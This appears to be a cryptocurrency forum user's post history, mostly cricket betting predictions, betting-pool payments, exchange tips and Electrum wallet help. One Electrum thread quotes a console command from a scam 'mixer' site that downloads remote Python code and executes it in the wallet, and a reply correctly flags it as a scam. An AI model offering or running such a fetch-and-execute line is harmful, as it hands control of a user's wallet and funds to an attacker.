Anyone following under 19 worldcup.?
Oh I check the scores whenever possible, but haven't watched a single game in U19 worldcup. With my work and study schedule, I hardly have time to watch the main events. But I somehow manage to watch a few games from time to time. Maybe I'll try to catch the Worldcup finals.
I envy those having lots of time to watch games  Lips sealed

Looks like the 3rd T20 match between PAK and BAN has been abandoned because of rain. So, it's 2-0 and PAK remains on top of the table.

763  Economy / Gambling discussion / Re: Test Cricket Prediction and Discussion Thread [self - mod] on: January 26, 2020, 05:34:33 PM

South Africa bowlers did a good job and took quick 5 -6 wickets. Although the England runs lead is still quite enormous but who knows if top order of the South Africans can bat well, we can see an interesting finish to this match.
SA needs 465 runs to win this match. No team has successfully chased a score that big to win the match. The biggest successful run chase in the fourth innings is 418 runs by WI against AUS.  So it's safe to say that ENG is going to win this match. I don't see a chance for a draw either, considering that we still have two days of play left.
764  Economy / Gambling discussion / Re: T20 and T20I cricket prediction and discussion on: January 26, 2020, 03:58:37 PM
Yes I didn't expect this from New Zealand team because the second T20 Match has been finished one side Match but  Indian team shows very well performance in all departments like batting, bowling, fielding. It gives easy win for Indian team.. India has been leaded the  series 2-0 but still more matches to go may be New Zealand bounce back.

I now doubt if they'll ever bounce back. While India performed well in all departments, they failed in all department since their last tour of Australia. It would be really nice to see them show a fight as they did with the ENG tour. If they continue this form, the morale of the NZ players will certainly drop and will affect the team badly.

766  Alternate cryptocurrencies / Altcoin Discussion / 51% attack on Bitcoin Gold yet again on: January 26, 2020, 06:22:43 AM
Bitcoin Gold was previously 51% attacked in May 2018, now it has happened yet again as per this GitHub post and two double-spends have been made possible on 23rd and 24th Jan 2020. There have been several instances where all the Bitcoin Forks have been 51% attacked, and this just proves that when the hash rate is low and the miners are centralised, the chain is no longer secure. So people choose wisely.

767  Local / India / Re: How do YOU convert your Bitcoins to INR ? on: January 25, 2020, 12:59:08 PM
Currently there are 2 easy way of doing it.

1. Zebpay - One of the easiest way to cash out bitcoins in INR. Simply download the App and do the KYC. Send your Bitcoin to your bitcoin address at Zebpay and Sell whenever you are happy with the sell rate. Withdraw money to your bank account instantly. You could use Promo Code REF09507764 on the Sell to earn 100 Rs of free Bitcoin.

2. Koinex - the .in domain exchange is a new one but pretty good as well. Just do the KYC and transfer Bitcoin to your Balance Bitcoin address at Koinex. Withdraw the amount instantly.

I hope it helps!

In which year are you in? This is 2020, Zebpay and Koinex have been closed for a long time now and are no longer live. Plz don't misguide users.

Can you guys please send the bet amounts to the corresponding addresses if you have not sent yet. I am holding BTC for JSRAW and deadly and I think they have enough in their addresses to cover the payment.

Sorry, I am still not very much available in my normal comfort zone to do regular forum stuffs. I will update once I have time.

Cheers.

I'll make the payment tonight, once I reach home. Btw, for Match 2, I'm the sole loser. So do you want me to send 0.0001 to the pool address or is it ok to send 0.00003333 to the 3 of you directly?

Edit: Since I'm not sure what the repayment addresses are, I have sent the funds to the Pool address for Match 2 and 3.

mobile version will be ready only by next month.  Not before the tournament. Sorry!

If the mobile version was made available, you could have attracted more users to join the tournament. I wasn't able to join because of it. Hope we can see more such tournaments in future.
770  Bitcoin / Bitcoin Discussion / Re: 1.1 BTC Puzzle by Phemex on: January 25, 2020, 10:36:07 AM
For someone like me, who wants all the hints to be on this thread. Here we go

1) The first 21-digit prime found in consecutive digits of e is: 957496696762772407663
2) The private key you derive from Satoshi’s portrait is a big integer, not Wallet Import Format (WIF)
3) The filename of the picture is irrelevant
4) The next step involves converting some words from the portrait, without I/O, into a 27-digit number
5) Go back to step 4) again if you can’t figure it out

Words from the portrait, without I/O
First: 166598323
prime: 541576313
found: 439179574
in: 2423
consecutive: 15425694213501219395
digits: 24100570284
of: 2706
e: 37
XRP: 102334
ETH: 45256
BTC: 35159
Phemex: 14899878097
^source: https://github.com/olalonde/phemex-puzzle

BTC, ETH, XRP, Phemex combo gives 27 digit number. So does "first, prime, found" and few others but BTC, ETH, XRP, Phemex makes more sense.

771  Economy / Gambling discussion / Re: Pakistan Cricket Board Broken all Previous record on special security on: January 23, 2020, 03:57:12 PM
Wow, the Lahore locals are gonna hate this as their business is gonna be seriously affected for 3 match days (24,25&27) And I doubt that 26th will be any better. So, if they are gonna give presidential security for T20 matches, what's gonna happen to the Test Match at Rawalpindi  Shocked 5 days of trouble for the locals? Closing non-residential shops is a bit too much in my opinion.
772  Economy / Gambling discussion / Re: Test Cricket Prediction and Discussion Thread [self - mod] on: January 23, 2020, 01:28:07 PM
Finally, Zimbabwe has a lead of 2 runs. Man Chakabva and Tiripank are eating balls like crazy  Grin 16 of 107 and 6 of 55. This is being nicely played by Zimbabwe. Srilanka still need 4 wickets

Edit: Tiripano gone  Undecided Looks I brought him bad luck.

774  Economy / Gambling discussion / Re: Test Cricket Prediction and Discussion Thread [self - mod] on: January 23, 2020, 11:03:28 AM
Zimbabwe have lost 3 quick wickets in todays start of play and are now at 112/3 . They still trail by another 45 runs and 7 wickets remaining. Sean and Brendan are playing well and if can add another 100 runs partnership from here will help Zimbabwe to recover this early loss of wickets and draw the test match else SL could win it .
Sean and Brendan are gone now, Lakmal splits the partnership by picking Brendan and Rajitha picked up Sean. 2 quick wickets after second session. ZIM are still trailing by 35 runs with 5 wickets in hand. Until 1st session, ZIM had the match headed towards, now the last 2 sessions are going to be a thrilling Grin Draw or SL winning in T20 style.. Let's see how much more can ZIM put on board.

@Royse777 I'm ok with 2 mutual betting pools IND Vs NZ and SA Vs ENG.

Regarding multi bet, I'll join IND Vs NZ, if you have one. I'll also join if you have a multi bet as JSRAW suggested.
777  Bitcoin / Electrum / Re: Update check failed? on: January 21, 2020, 07:09:38 PM
Weird... it's working perfectly here:
https://i.imgur.com/BBbVs30.png

Anyone else having issues? Huh

Just checked for updates manually, it works fine for me too, with and without VPN. Maybe, the issue was resolved very quickly.

Edit: Just checked the issues page, they have asked to enable debug logging and check the logs.

How to enable debug logging?
On Linux/Mac, if you start Electrum from terminal, you can specify the -v flag, to enable debug logs in the terminal (to stderr). This option does not work on Windows.

Logging to disk is also available since version 3.3.5, and this works on Windows too.

Using the Qt GUI, go to Tools menu > Preferences > General tab, and tick "Write logs to file". After restarting Electrum, debug logs will be written to the /logs folder inside the :ref:`datadir <datadir>`.
778  Bitcoin / Electrum / Re: Server exception in console on: January 21, 2020, 06:46:45 PM
I was in the process of getting some bitcoin refunded from a mixer and the console gave out a line "Server exception, please, contact with support". I am new to electrum and I have been trying my best to find a way to report it to the support but I can't find the contact, so I'm here posting on this forum. The line a I gave that made it give out this line was exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/<output_btc_address>').text)"). I gave the correct output address and I thought it was working because it asked for my account password.

Bitcoinmixer.eu is a scam site as per this thread by LeGaulois. Mixers have nothing to do with Electrum console. If you are looking for a mixer service, better use one which is marked as genuine from the list given by LeGaulois.

There is also a high chance that your wallet has been compromised, so it's better to move your funds to a safe wallet.

DT or Not. None should promote a known scam.

BTW, does this really belong to Meta  Huh If a DT is doing wrong, start a thread in Reputation, convince other DT members to add him to the distrust list. Simple as that. Why drag this to Meta?

780  Economy / Gambling discussion / Re: Test Cricket Prediction and Discussion Thread [self - mod] on: January 21, 2020, 01:39:40 PM
SL is looking to post a gigantic first innings score and will for ZIM to chase it which will be their plan IMO and even if ZIM scored enough runs then SL can win the leading runs in the last day by scoring at high scoring rate per over. And its important to mention ZIM is really playing well at the moment.
Sri Lanka have the batting to post a good total, not sure whether the pitch is difficult to score runs as both teams are moving slowly, Zimbabwe was going under 2 runs and now Sri Lanka is batting under 3 runs per over and the possibility is a draw by the way the match is going.
I'm also eyeing for a draw, infact made a bet on a Draw. Currently Srilankans are down to 233/4. There's still 1-2 hours play left and I'm sure ZIM will try to bowl less overs as they did yesterday. The scoring rate of SL is also not promising. I don't see SL posting around 600 runs on board by tomorrow's tea even if everything goes right for them. And considering, that ZIM played really well, I doubt SL will take all wickets of ZIM within 120 overs.
If anyone is planning to bet on a draw, there is still a chance for 2x  Smiley Bet at your own risk though
